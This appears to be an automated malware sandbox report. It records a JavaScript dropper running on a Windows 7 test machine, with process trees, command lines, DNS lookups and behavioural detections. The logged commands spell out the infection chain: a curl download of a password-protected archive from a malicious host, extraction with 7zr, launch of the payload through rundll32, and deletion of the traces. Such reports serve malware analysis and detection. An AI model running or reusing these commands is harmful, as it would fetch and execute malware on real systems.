Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 14, 2023, 1:39 p.m. | Sept. 14, 2023, 1:41 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js
2544-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
2636 -
cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
2700 -
-
curl.exe curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location
2864
-
-
curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
2936 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
2508-
animi.y "C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o"
2656
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
2752 -
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
2824 -
cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
2912 -
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
2964-
rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
1456
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
3040
-
Name | Response | Post-Analysis Lookup |
---|---|---|
restohalto.site | ||
burpeesconpan.com | 198.57.242.58 | |
www.7-zip.org | 49.12.202.237 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.101:49173 49.12.202.237:443 |
None | None | None |
TLS 1.3 192.168.56.101:49169 198.57.242.58:443 |
None | None | None |
file | C:\Users\test22\AppData\Local\Temp\officia.p.bat |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c"" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c"" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y" |
cmdline | cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p" |
cmdline | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" |
cmdline | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y" |
file | C:\Users\test22\AppData\Local\Temp\animi.y |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" |
cmdline | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" |
cmdline | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y" |
file | C:\Users\test22\AppData\Local\Temp\animi.y |
file | C:\Users\test22\AppData\Local\Temp\saepe.o |
file | C:\Users\test22\AppData\Local\Temp\animi.y |
parent_process | wscript.exe | martian_process | cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c"" | ||||||
parent_process | wscript.exe | martian_process | rundll32 "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875 | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat" | ||||||
parent_process | wscript.exe | martian_process | cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c"" |
file | C:\Windows\System32\cmd.exe |
file | C:\util\curl\curl.exe |
file | C:\Windows\System32\rundll32.exe |